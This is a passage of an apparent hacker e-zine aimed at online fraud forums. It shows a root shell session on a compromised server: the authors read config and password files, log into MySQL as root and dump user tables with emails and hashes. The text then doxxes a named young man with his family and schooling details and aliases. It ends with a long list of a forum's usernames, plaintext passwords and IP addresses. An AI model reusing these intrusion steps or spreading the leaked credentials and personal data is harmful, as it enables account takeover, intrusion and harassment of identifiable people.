19 2010 propiska +drwxr-x--- 5 scenehack www 512 Feb 22 2010 scenehack +drwxr-x--- 4 snetwork www 512 Jul 14 22:01 snetwork +drwxr-x--- 5 szenevz www 512 Mar 11 2010 szenevz +drwxr-x--- 2 test4me www 512 Sep 2 01:39 test4me +drwxr-x--- 4 thefuelru www 512 Jan 22 2010 thefuelru +drwxr-x--- 4 useresu www 512 Aug 19 11:27 useresu +drwxr-x--- 4 useresu1 www 3584 Aug 19 11:47 useresu1 +drwxrwxr-x 6 vestacomp www 512 Dec 20 2010 vestacomp + +# cd ganymedes + +# ls -la +total 1180 +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 . +drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. 
+-rw------- 1 root www 520192 Oct 5 21:43 bash.core +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 el-basar.biz +drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 newsportal24.net +drwxrwx--- 2 ganymedes www 53760 Oct 6 00:38 temp + +# cd newsportal24.net + +# ls -la +total 388 +drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 . +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. +-rw-r--r-- 1 ganymedes www 397 Sep 27 18:24 index.php +-rw-r--r-- 1 ganymedes www 16572 Sep 27 18:24 license.txt +drwxr-xr-x 2 ganymedes www 512 Sep 29 00:50 test +-rw-r--r-- 1 ganymedes www 4343 Sep 27 18:24 wp-activate.php +drwxr-xr-x 9 ganymedes www 2560 Sep 27 18:25 wp-admin +-rw-r--r-- 1 ganymedes www 40243 Sep 27 18:24 wp-app.php +-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-atom.php +-rw-r--r-- 1 ganymedes www 274 Sep 27 18:24 wp-blog-header.php +-rw-r--r-- 1 ganymedes www 3931 Sep 27 18:24 wp-comments-post.php +-rw-r--r-- 1 ganymedes www 244 Sep 27 18:24 wp-commentsrss2.php +-rw-r--r-- 1 ganymedes www 3577 Sep 27 18:24 wp-config-sample.php +-rw-rw-rw- 1 www www 3896 Sep 27 18:33 wp-config.php +drwxr-xr-x 6 ganymedes www 512 Sep 27 18:40 wp-content +-rw-r--r-- 1 ganymedes www 1255 Sep 27 18:24 wp-cron.php +-rw-r--r-- 1 ganymedes www 246 Sep 27 18:24 wp-feed.php +drwxr-xr-x 8 ganymedes www 2560 Sep 27 18:26 wp-includes +-rw-r--r-- 1 ganymedes www 1997 Sep 27 18:24 wp-links-opml.php +-rw-r--r-- 1 ganymedes www 2618 Sep 27 18:24 wp-load.php +-rw-r--r-- 1 ganymedes www 27601 Sep 27 18:24 wp-login.php +-rw-r--r-- 1 ganymedes www 7774 Sep 27 18:24 wp-mail.php +-rw-r--r-- 1 ganymedes www 494 Sep 27 18:24 wp-pass.php +-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rdf.php +-rw-r--r-- 1 ganymedes www 334 Sep 27 18:24 wp-register.php +-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rss.php +-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-rss2.php +-rw-r--r-- 1 ganymedes www 9839 Sep 27 18:24 wp-settings.php +-rw-r--r-- 1 ganymedes www 18646 Sep 27 18:24 wp-signup.php +-rw-r--r-- 1 ganymedes www 3702 Sep 27 
18:24 wp-trackback.php +-rw-r--r-- 1 ganymedes www 3266 Sep 27 18:24 xmlrpc.php + +# cat wp-config.php +_irty|#bG+hp@Qj6%qo.-N d.ZnGC=f@`m'); +define('AUTH_SALT', 'T|#(IjI)JW%66G(e2S}$k-8/QY.iEfl^/v}PWgtk$@cnw9d)N pAm4A,A.~f+x_Hc}V^Wi${iO%`$FJb8%~W?$|*l{%$+cK2.{A*ZNW>)~Ht0r,p B[3('); +define('LOGGED_IN_SALT', 'n[Un&54kqxFw|!d]ccfCV5ajNklT`YN/YECk (K2}T{;,0,*!|)ru}/ysPG s$v-'); +define('NONCE_SALT', 'cm$vLkM34?(0u}&O)SOp>qCRZq*LJY``ym%-tNFg+MQ^#L{x~@c,d@fCJ27{;d~8'); + +/**#@-*/ + +/** + * WordPress Datenbanktabellen-Präfix + * + * Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank + * verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte! + */ +$table_prefix = 'wp_news'; + +/** + * WordPress Sprachdatei + * + * Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende + * Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo + * Wenn du nichts einträgst, wird Englisch genommen. + */ +define('WPLANG', 'de_DE'); + +/** + * For developers: WordPress debugging mode. + * + * Change this to true to enable the display of notices during development. + * It is strongly recommended that plugin and theme developers use WP_DEBUG + * in their development environments. + */ +define('WP_DEBUG', false); + +/* That's all, stop editing! Happy blogging. */ + +/** Absolute path to the WordPress directory. */ +if ( !defined('ABSPATH') ) + define('ABSPATH', dirname(__FILE__) . '/'); + +/** Sets up WordPress vars and included files. */ +require_once(ABSPATH . 'wp-settings.php'); + +# cd .. + +# cd el-basar.biz + +# ls -laR +total 12 +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 . +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 85c91o822x3olps1d8179xizbm27 + +./85c91o822x3olps1d8179xizbm27: +total 12 +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 .. 
+drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 check + +./85c91o822x3olps1d8179xizbm27/check: +total 20 +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. +drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 vp2q910pxc2ifo091y + +./85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y: +total 16 +drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 . +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. +-rw-r--r-- 1 www www 0 Aug 11 01:55 6337180250025522924 +-rw-r--r-- 1 www www 0 Aug 9 19:04 6337180250037669499 +... + +# Nothing left here anymore :(^C +# Better check the database ... + +# cat /etc/my.passwd +bde413a2c8751ac97887f11d6efb2c39 + +# mysql -u root -pbde413a2c8751ac97887f11d6efb2c39 +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 205220 +Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a + +Type 'help;' or '\h' for help. Type '\c' to clear the buffer. + +mysql> SHOW DATABASES; ++--------------------+ +| Database | ++--------------------+ +| information_schema | +| alg_forum | +| alg_hide | +| alg_zzz | +| crank2010_forum | +| crimecore_board | +| exchanger_db | +| filip_eldent | +| filip_eldent_ | +| ganymedes_bosscc | +| ganymedes_bossm | +| garf_ban | +| hcgcrew?forum | +| jeka-test_ | +| lordknight_forum | +| lordknight_teon | +| madrage_wbb | +| margosha_forum | +| margosha_sait | +| mmgen_3 | +| mmgen_ref | +| mmgen_shop | +| mr101_old | +| mr101_w3 | +| muraaat_mybb | +| mysql | +| onlineschauen_bi | +| onlineschauen_ho | +| onlineschauen_ma | +| onlineschauen_on | +| onlineschauen_se | +| pavlrse_xshop | +| propiska_gr | +| propiska_us | +| propiska_work | +| scenehack_board | +| snetwork_4g741 | +| snetwork_sh24op | +| szenevz_123 | +| szenevz_db | +| test | +| test4me_db | +| thefuelru_pp | +| useresu1_prava | +| useresu_bollist | +| vsocks_vsocks69 | +| vsocks_vsocks69_ | +| vsocks_vsocks69_a | ++--------------------+ +48 rows in set (0.00 sec) + +mysql> USE 
ganymedes_bosscc; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> SHOW TABLES; ++----------------------------+ +| Tables_in_ganymedes_bosscc | ++----------------------------+ +| admin_navi | +| navi_de | +| news | +| produkt_gruppen | +| produkt_items | +| produkte | +| psc | +| support | +| supporter | +| supporter_group | +| ukash | +| users | ++----------------------------+ +12 rows in set (0.00 sec) + +mysql> SELECT count(*), sum(guthaben) FROM psc; ++----------+---------------+ +| count(*) | sum(guthaben) | ++----------+---------------+ +| 74 | 1080 | ++----------+---------------+ +1 row in set (0.00 sec) + +mysql> # Not bad ... + +mysql> SELECT count(*) FROM users; ++----------+ +| count(*) | ++----------+ +| 1359 | ++----------+ +1 row in set (0.00 sec) + +mysql> SELECT * FROM users WHERE guthaben > 1; ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +| id | username | pass | email | reason | guthaben | access | ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +| 1 | blamedyy | ==44c8cf514440543c728bee1864a1a466 | blamedyy@yahoo.com | | 897 | 1 | +| 474 | hung2304 | ==2864d82ad1e49fffcafe85976c602868 | jidar@hotmail.de | faked psc | 8 | 33 | +| 485 | SlamD | ==65259faf801899cfd1f27b389b8849ac | arx2@gmx.net | | 3 | 0 | +| 555 | AEQUITAS | ==ee61e9fd8caafb735406838f18235281 | aequitas@z1p.biz | | 3 | 0 | +| 618 | Jettic | ==a1eba8157beb255a503e8b586e141b61 | jettic@mail.ru | | 3 | 0 | +| 634 | me2 | ==cfbf7976666e981d217cfed255d7db6e | fff8756@yahoo.de | | 3 | 0 | +| 640 | riddick | ==24217c603630ce2339503db1d009b8c7 | riddicker1@web.de | | 3 | 0 | +| 817 | Hilli | ==8e6a108a6555e604f9f652d679c7ab29 | shiva166@web.de | | 2 | 0 | +| 865 | killersm | ==6b8daaab17c40f5fbf9aab0db8dc21bf | jhir@jire.de | | 3 | 0 | +| 875 | 
skilled | ==195b9d5a1e7d2ef7237eb467533ec1f2 | sk@sk.com | | 3 | 0 | +| 943 | FatJoe | ==ed35e0bc4b6a22cd24f74e039533276f | sedaephi@emailgo.de | | 2 | 0 | +| 963 | Bogner | ==b3a0ad39806aced9241a80b9a11868e4 | placebo84@hotmail.de | | 3 | 0 | +| 971 | keks | ==572330601360f7945006cae2ea549bab | aggroberliner222@web | | 3 | 0 | +| 975 | saidone | ==aba11e56813d842283854c6ccccbef60 | saytec@gmx.de | | 3 | 0 | +| 1022 | lczero | ==37d1475d60b2c99b1c222a5a5acc2c58 | sdpfmodpmgg@web.de | | 3 | 0 | +| 1094 | peterpan | ==fdc6b6d13338d1b9f1099dcec97cb2a8 | tfmpp1@web.de | | 3 | 0 | +| 1261 | Tommy | ==7d01922eeaeb9682953c49fd20ece458 | tomdanger@rbcmail.ru | | 3 | 0 | +| 1443 | 2345176 | ==9ddfac889552a0cdf635e46c8c70b01b | b2121870@prtnx.com | | 3 | 0 | +| 1466 | badboy44 | ==3fa46350e1a9aa6f09a32cb342eb8c31 | anja_ludi@web.de | | 3 | 0 | +| 1484 | delphin | ==7b8d81c371ada9fd93a448c7ac45b346 | asdgasd@asdga.de | | 3 | 0 | +| 1494 | booom | ==ee6c8e07eed464a4842c2335b4977309 | jhghj@gggh.de | | 3 | 0 | +| 1512 | tetrispr | ==1e63fa4217770660acccbcf4acabfc67 | tatakiru@gmx.de | | 3 | 0 | +| 1513 | stage6 | ==660d11767f02a3a7403bfe47954de520 | carders@hotmail.de | | 3 | 0 | +| 1586 | m1sc | ==1d28ce4b9ff02e4a08432036f7316db1 | m1sc@gmx.de | | 3 | 0 | +| 1619 | anubis | ==dda9ab9768f7367198227e69b83cedbd | xAnuBiSx@gmx.de | | 3 | 0 | +| 1671 | carlos | ==2a363b531b95578a7d816dd02cde60d6 | carlos---@live.de | | 3 | 0 | +| 1715 | advanced | ==924f32ec3a868e5555ee1910d4242ce1 | advanced@gnx.de | | 3 | 0 | +| 1719 | Blizzard | ==74281aac5624b24fb3472feab558a5d1 | kgadkhagj@spambob.de | | 2 | 0 | +| 1735 | ripit | ==eed34671e873f2aa07d30d878f182ce0 | ripit@mailinator.com | | 3 | 0 | ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +29 rows in set (0.00 sec) + +mysql> Aborted + +There we got one of Ganymedes' other accountnames and his email: +blamedyy@yahoo.com. We better check out some proftpd logs. 
Ganymedes +constantly used proxies, but there is one login sequence where he did +not: + +# grep 93.232.*ganymedes proftpd-transfer.log +Mon Jan 24 15:34:21 2011 0 212.117.174.26 0 /home/ganymedes/el-basar.biz/85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y/6337180258293023293 a _ d r ganymedes ftp 0 * c +Mon Feb 07 02:04:40 2011 0 93.232.193.137 2416 /home/ganymedes/el-basar.biz/designe/design/navi.php a _ o r ganymedes ftp 0 * c +Mon Feb 07 02:04:45 2011 0 93.232.193.137 1709 /home/ganymedes/el-basar.biz/designe/design/title_gh.php a _ o r ganymedes ftp 0 * c +Mon Feb 07 02:09:23 2011 0 93.232.193.137 1917 /home/ganymedes/el-basar.biz/co2xcpqwlvxmi/config.php a _ o r ganymedes ftp 0 * c + +Deutsche Telekom AG, NRW, Germany. Well done kid. + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------==={ The Happy Ninja Faker }===))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Some of you guys might have noticed that a ~ | ||( );, +"HappyNinjas" Twitter account has been created ( ,;.)-\ / ';, +on the 4th or 5th February 2011 which seemed \ ( \ ( +to offer the opportunity to receive the latest || \\ +news regarding our actions. As we observed this /_( /_( +account got some attention and even obtained nearly 100 followers. +Hurray. However it isn't ours :( To get more publicity the creator +also published a fake zine called exp04.txt at +http://www.pva-apeldoorn.nl/exp04/exp04.txt. It was very clear that +the person didn't do this to help us or fight the fraudscene, but to +spread lies. So we did the only logical thing: We hacked that server +too, removed the fake and copied some logs. 
Here are some excerpts: + +2011-02-10 16:19:24 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04 - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.13 - - 301 + 0 0 370 399 500 +2011-02-10 16:19:26 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/index.html - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6 +.13 - - 200 0 0 316 400 687 +2011-02-10 16:58:53 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/exp04.txt - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6. +13 - http://twitter.com/ 304 0 0 236 527 296 + +Whups, looks like someone did a messy job there. Well, at least he +used a proxy. But after some black magic we also hacked the proxy and +it showed us the right way to payback. So who did this lousy job, you +may ask? Noone else but 3lite aka InVisible, (former) moderator and +admin of several fraud orientated message boards. It wasn't hard to +find more information about him, right Robin? + +To understand why someone would do such things we first have to +understand who he is. Robin is 19 years old and comes from a typical +middle class family. Both parents are employed, the father as an +administrative official, the mother as an industrial clerk. He also +has three sibs. His family consists of baptists (a crazy sect, calm +but annoying), thus it is not really surprising that his mother also +spends way too much money on esoteric medicine. I guess if you can +believe in the biblical history of creation you can believe in +anything. His education started at the grammar school (Gymnasium) in +2002. After two wasted years he switched to middle school +(Realschule). Three years later he had to switch again, this time to +secondary modern school (Hauptschule). The story of his life. This +year he finished technical college (Berufsfachschule) with a rather +bad grade. 
In his virtual life he mostly works with botsoftware, +infects people and sells the stolen data to other fraudsters. In other +words: he is a trojan skiddy. Sounds like a bored, unmotivated child +without much talent and that is exactly what he is. + +He used more than ten different nicknames in the past, because after a +while they all had a very bad reputation. And that are only the names +we know about, there are probably more. + + _ _____________________ _ + | | | | + |b| Deoxys |b| + |o| Aerodactyl |o| + , |x| Raid0n17 |x| + (@| | | DeoOxygen | | + ,, ,)|_____|o| ExplosiV / ExplOsiv |o|_______ +//\\8@8@8@8@8@8 / _ _ |f| Androx |f| _ _ _ \ +\\//8@8@8@8@8@8 \_____| | 3lite / 3lite2k11 | |_______/ + `` `)| |s| Raiden |s| + (@| |h| »InVisible |h| + |a| R@ven |a| + |m| Fr33w4re |m| + |e| VexX |e| + |_|_____________________|_| + +If you want to check him out yourself, here are some links. More +information can be found in the attached files. + +http://www.youtube.com/Raid0n17 +http://www.youtube.com/DeoOxygen +http://aerodactyl.wordpress.com/ +http://steamcommunity.com/profiles/76561197968670011 + +He loves to use variations of "1337" and "troll" as his passwords. +Very secure, you should give it a try. + +Our conclusion: This guy is really fucked up. He is a pathological +liar, a deadbeat, a scammer. Avoid him if you can. + +Side note: The following two texts have already been published by us, +because the given circumstances forced us to in that time. Since both +texts have not made it into an "official" ezine yet, we decided to +print them here. Have fun! + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((======={ Swissfaking.net }=====------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Swissfaking.net has not been in the center of +,;' \ /-(.;, ) our interest for long, mainly because one doesn't + ) / ) / hear a lot about it. From the outside they just + // || seem to be a small board, not any worse than + )_\ )_\ the average kiddyforums. 
+However, when looking at it closely, one notices that swissfaking +manages to fully compensate for their size with the most shrewd users. +These peoples' only interest seems to make money. Lots. Fast. No +matter what. Swissfaking consider themselves a very special community; +that's why the registration has been closed since 2009 and replaced by +an invite system. Under these circumstances one would not expect great +activity in the forums, though as we first logged in, we were +bombarded with piles of blinking flash ads. The most ridiculous one +was probably that of some fag selling credit cards. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| d3adline: | +| You want buy without any risks? You want fast car? You want hot | +| girls? You want have glamorous partys? Then buy ccs from d3adline | +|____________________________________________________________________| + +This again shows pretty well how ignorant those fucks are; as if a +credit card brought you from mom's basement to high life. 
Just because +the majority of swissfaking's users probably suffer from the same +mental disease as the mister quoted above, we have prepared a +treatment, but wait, before we start, here are Username:plain +password:IP:logintime of almost all users: + +p5n:@Copy10cv:91.89.69.182:January 2, 2011, 9:24 pm +mcdrive:belinea:188.23.69.210:January 2, 2011, 11:19 pm +n3ro:LbiI:{mq>K kZäj`,}} :213.232.200.177:January 3, 2011, 7:30 pm +pandora:nokia6280:84.61.88.65:January 2, 2011, 10:36 pm +fenriz187:gelomyrtol:92.225.202.186:January 6, 2011, 8:09 pm +tezeewood:26nu4uku26nu4uku$:109.91.113.26:January 2, 2011, 9:16 pm +china:§k$vf@n1:81.210.136.47:January 2, 2011, 11:54 pm +ibrains:qw2io0pl:46.115.102.70:January 2, 2011, 9:29 pm +rox:rox24255:80.122.42.30:January 3, 2011, 11:45 pm +slash:keinproblem15:83.135.112.150:January 3, 2011, 1:21 am +punisher:youtube26:85.180.135.133:January 2, 2011, 11:27 pm +lolboter:EsPZLtQa2x=9Mf@I:80.171.11.252:January 5, 2011, 11:55 pm +fasti1001:lasterraster:77.20.136.173:January 4, 2011, 11:22 am +d0pz:lollollol123miregal95:213.163.64.43:January 2, 2011, 11:48 pm +tolja:fujitsusiemens22:91.61.147.49:January 2, 2011, 11:55 pm +solt:lolgolol:95.143.192.159:January 2, 2011, 9:09 pm +beex:ab1cd2:91.89.190.46:January 2, 2011, 9:56 pm +pimperich:M1YgRgXB:79.228.118.129:January 3, 2011, 10:28 am +curly:Eminem:79.193.89.45:January 2, 2011, 10:10 pm +jasmin75:yId69xqsmBve:87.150.137.16:January 2, 2011, 9:29 pm +justmike:t3xxe33:84.168.231.191:January 2, 2011, 10:10 pm +du3en:kjxxdj13:92.73.69.139:January 2, 2011, 11:00 pm +dr.bob:Swissfaking2011:84.61.238.224:January 2, 2011, 10:13 pm +prototype:matrix:46.126.244.198:January 3, 2011, 2:13 am +winkelmann72:jonaskiessling:89.208.35.190:January 2, 2011, 10:03 pm +tollik:audi80:93.205.10.77:January 2, 2011, 9:43 pm +cybi0nic:67k57eiSswissfaking:93.182.171.109:January 3, 2011, 4:10 pm +wuschi:fetterJaxel:82.83.42.21:January 3, 2011, 8:26 am +juan:55555:217.23.6.162:January 3, 2011, 6:24 pm 
+fusselpo:schatz11:77.22.240.27:January 4, 2011, 10:00 pm +nomercy:ymZZIFIF0nCZZ$BW:62.143.126.35:January 2, 2011, 9:26 pm +jamyla:2wsx6zhn:93.217.241.134:January 6, 2011, 5:33 pm +nemiz:2z3545:94.220.79.39:January 4, 2011, 11:47 pm +theird21:kmk00025879:217.88.114.20:January 2, 2011, 11:11 pm +corvu5:corvu54swissfaking:95.222.116.238:January 2, 2011, 10:13 pm +s0xtech:s0xy0000:217.231.252.159:January 2, 2011, 9:39 pm +speedygamer:Nzhdtlcwb1:89.149.242.16:January 3, 2011, 12:39 am +die-wiese:Ventura83:188.193.8.225:January 3, 2011, 12:47 pm +goldrock:56&6ght$$!awwEfb:62.167.138.232:January 2, 2011, 10:48 pm +devilboy:pelubo62:87.106.94.167:January 4, 2011, 3:04 pm +fam0us:ichliebedich1:92.241.168.24:January 2, 2011, 10:49 pm +ares:mmmmmmmmm:80.108.172.227:January 5, 2011, 9:48 pm +imer:misakifan:93.217.127.220:January 2, 2011, 9:48 pm +secdaking:$p!tT3r2k!0:79.211.101.154:January 3, 2011, 12:36 am +seriousman:regen@44:79.203.222.236:January 2, 2011, 11:08 pm +mpcool:famous:77.183.227.158:January 3, 2011, 5:13 pm +sine:ninaninabekim:79.197.201.62:January 2, 2011, 10:14 pm +famous:aLq3lm$%:92.241.190.253:January 2, 2011, 10:29 pm +psych0:achtzehn32:79.204.163.237:January 3, 2011, 3:41 pm +trickz:crazyfrog1234:87.118.118.37:January 2, 2011, 9:27 pm +pseudo:hackedbypseudo:78.48.103.103:January 2, 2011, 9:45 pm +n00be:kjvhjvhjhvmvh:92.241.190.253:January 2, 2011, 10:11 pm +txto:123456:88.67.188.148:January 3, 2011, 2:17 am +mehmet111:hahaka:66.90.73.223:January 3, 2011, 4:28 am +daemon:weed1337:84.149.94.90:January 3, 2011, 6:45 pm +sugar:xip6hexi0:217.91.210.243:January 4, 2011, 9:12 am +dextrose:.l33rlauf:92.241.168.90:January 2, 2011, 11:04 pm +weareone:Ichwurdeam23.07.1994geboren.:212.117.174.26:January 2, 2011, 9:49 pm +fatalerror:pulamea18:88.117.121.105:January 4, 2011, 2:39 pm +devolo:PT1346798522!:93.130.53.175:January 2, 2011, 10:14 pm +lestat:123456:79.236.62.169:January 3, 2011, 4:30 pm +zahlenpilz:hacksector:92.77.4.189:January 3, 2011, 9:33 pm 
+ivenom:1337s!lenTxD:87.143.216.239:January 2, 2011, 9:45 pm +stegen:daniel:188.194.83.146:January 6, 2011, 4:54 pm +ch4in:1384gwm123:217.187.138.90:January 3, 2011, 12:14 am +hesgoodboy:01724186115:217.114.211.242:January 3, 2011, 1:30 pm +michi:äöüäöü:91.42.237.242:January 2, 2011, 9:14 pm +lazarus:Google123:85.178.160.144:January 2, 2011, 9:30 pm +paran0id:bravsobrav:212.117.160.22:January 2, 2011, 9:01 pm +simul4nt:comnoboat:109.192.198.159:January 3, 2011, 12:23 am +dicethrower:12wue345rfe6l:212.23.103.26:January 3, 2011, 2:35 pm +raydo:h3llboy:93.208.239.102:January 4, 2011, 12:04 am +janus:vladimir:92.107.113.49:January 2, 2011, 10:49 pm +crankrex:monohydrat:95.89.188.29:January 3, 2011, 7:17 pm +paradox:BTYM8h:92.241.168.90:January 2, 2011, 9:25 pm +bluehero:1qay2wsx:84.138.178.123:January 2, 2011, 11:50 pm +nobody:pagewrapper:83.170.114.16:January 6, 2011, 12:06 am +freakout:Ghana11:178.200.60.53:January 4, 2011, 10:35 pm +loop:1337loopi:78.48.162.155:January 4, 2011, 9:44 am +phr34kz:UX3eXfSzZ5q7N0{:212.117.162.222:January 2, 2011, 9:19 pm +hoodstar:lieblingssarah271994:78.50.94.114:January 4, 2011, 12:45 am +alphahack:alphahack:188.108.81.215:January 3, 2011, 11:59 pm +silence:8530ch:91.65.94.151:January 2, 2011, 9:16 pm +christian:123456:78.42.172.154:January 2, 2011, 10:05 pm +batonde:gDHoCJHG-6*Ae1Lj:88.73.87.81:January 6, 2011, 7:38 pm +jokereloaded:stefan1337!:217.225.87.229:January 3, 2011, 11:22 am +oneone1:BVBBERKY212:91.33.186.9:January 3, 2011, 3:34 pm +vodka:159ZAYCXS792QUALIAdRO//:217.255.207.169:January 2, 2011, 9:25 pm +killermouse:kiffer:78.55.117.164:January 3, 2011, 11:26 pm +run.:duschlampen!1:79.194.93.91:January 3, 2011, 9:45 pm +1337_reaction:1002003000:92.241.165.69:January 2, 2011, 9:55 pm +king6545:Soh2vebo333:178.203.138.49:January 4, 2011, 11:31 pm +basics:nicki123!:91.67.60.117:January 2, 2011, 9:03 pm +deco:julian08:178.202.239.33:January 2, 2011, 9:38 pm +ricardiazz:swissfaking:89.13.14.5:January 2, 2011, 9:16 pm 
+delax:hackerfun:188.193.194.86:January 2, 2011, 9:11 pm +jamesfb:fenerbahce:94.221.91.129:January 2, 2011, 10:43 pm +icebox87:apfel23:79.253.148.110:January 3, 2011, 1:50 pm +tryit:187lalalala187#:88.70.196.173:January 2, 2011, 11:46 pm +mrk:422mark646:62.178.8.56:January 3, 2011, 12:43 am +peter_pan:2bon2b:62.143.149.223:January 6, 2011, 9:33 am +tweaknap:%$HD1337PS$%:178.142.84.178:January 3, 2011, 12:11 am +nokz:aufleg0rn:92.227.68.28:January 3, 2011, 8:33 am +shoxx:g07091992:92.74.162.228:January 3, 2011, 4:34 pm +edgeee:za32qt4s.:80.201.55.194:January 3, 2011, 2:15 pm +w.t.f.:lol123:217.226.243.83:January 3, 2011, 11:06 pm +d3rd0n:12cocsli:93.217.26.178:January 3, 2011, 2:52 am +sp33djunkie:17331733:212.117.162.222:January 2, 2011, 9:24 pm +infomailer:9ö7&4k.ü_ä VmSH.NmwD:77.23.8.178:January 2, 2011, 10:01 pm +nesia:Nummer13Lebt!!!:82.82.167.173:January 4, 2011, 11:13 am +nyuu:123456789:87.122.143.30:January 2, 2011, 10:03 pm +selix:Bitrate187:188.192.238.47:January 3, 2011, 12:09 pm +smithz:Sarah1988:92.241.190.253:January 3, 2011, 1:40 am +ryl666:lolomg123:83.216.241.77:January 2, 2011, 10:20 pm +boardmaster2010:16052009:78.55.59.70:January 3, 2011, 9:06 pm +siverman:276910:77.187.55.123:January 3, 2011, 2:03 pm +deathnote:Shinigami1:91.113.13.4:January 3, 2011, 5:19 pm +ghostt:qawsed:95.128.242.224:January 6, 2011, 3:11 am +kingmail:1qay2wsx3edc4rfv:79.209.8.113:January 3, 2011, 2:40 pm +xxlegendaxx:123234:89.217.150.18:January 3, 2011, 11:25 am +ndtbit:ndtbit7:80.146.17.64:January 3, 2011, 1:33 am +anno:valerka:90.136.45.75:January 4, 2011, 8:04 pm +garrisson:hallo123:92.106.62.29:January 3, 2011, 12:45 pm +spitfir3:012345:93.232.245.248:January 6, 2011, 12:41 pm +z0mg:hitler123456:77.23.89.32:January 3, 2011, 4:18 am +prisma:dasydasy15:87.166.73.53:January 3, 2011, 11:31 pm +itunes:edu123hil:24.170.79.116:January 3, 2011, 10:55 pm +leopard:teufeline<3swiss:213.163.64.43:January 2, 2011, 9:35 pm +m00n:berlin123:188.193.230.70:January 2, 2011, 9:51 pm 
+danemone:danemonekoklopspocicdvbt:92.241.168.24:January 4, 2011, 2:39 am +rolf32:fickmich069:213.163.65.50:January 2, 2011, 10:49 pm +accoli:hallo123:80.80.246.188:January 4, 2011, 11:23 am +st0re:123456:109.193.140.236:January 3, 2011, 4:22 pm +wrigleys:schwippschwapp999:93.192.161.49:January 2, 2011, 9:28 pm +jigga666:159951baumheide123:109.90.93.220:January 2, 2011, 11:42 pm +sar:6%$45De§$wER:92.231.164.131:January 3, 2011, 12:40 am +deffjeff:30111970:94.219.18.179:January 4, 2011, 1:48 pm +playa_:1abc23z1:217.248.142.13:January 2, 2011, 9:54 pm +cy0n!x:55de!xz7:178.3.205.85:January 4, 2011, 4:31 pm +mc_wrei:fiona2:84.75.38.254:January 3, 2011, 8:49 pm +br0unce:!$spainyswiss$:85.214.39.134:January 2, 2011, 9:00 pm +saxas:6bhy&#nVKenahwLU7oj6WzD&JA%ZnT:89.217.182.32:January 2, 2011, 9:35 pm +peevee:aimer89:78.50.91.135:January 3, 2011, 2:45 am +mark21:wiesonicht:217.248.156.69:January 3, 2011, 12:22 am +keks:Rof1rwe88$:178.1.51.57:January 3, 2011, 1:52 pm +cyborgx:dihodo62:91.50.105.196:January 3, 2011, 2:15 am +tomdanger:gogogo123:92.241.168.24:January 2, 2011, 9:34 pm +logg23:koruku11:91.48.156.95:January 2, 2011, 9:35 pm +inferior:210340:91.113.110.183:January 4, 2011, 2:56 pm +djinn:m28h611!:109.90.88.103:January 3, 2011, 8:05 pm +fred777:swissfaking.6x.toto:91.17.194.74:January 3, 2011, 1:22 am +w00dka:technobase1337:91.7.224.30:January 2, 2011, 10:51 pm +achmatov:hansdieter1:87.148.16.206:January 2, 2011, 11:51 pm +acidraining:$@cidr@ining$:95.208.135.191:January 3, 2011, 12:56 am +h0us3:josiaistschwarz:85.25.184.102:January 2, 2011, 9:10 pm +franky:Franky12345678909*:212.117.172.231:January 2, 2011, 9:16 pm +blueye:gnomi1337:202.60.66.32:January 3, 2011, 5:04 pm +chillerdady:K@t0LiDoR:87.181.209.28:January 3, 2011, 12:28 am +flash:nx6200ax:217.94.255.158:January 2, 2011, 11:59 pm +kuku:kuhfrosch123:79.242.127.235:January 3, 2011, 5:45 pm 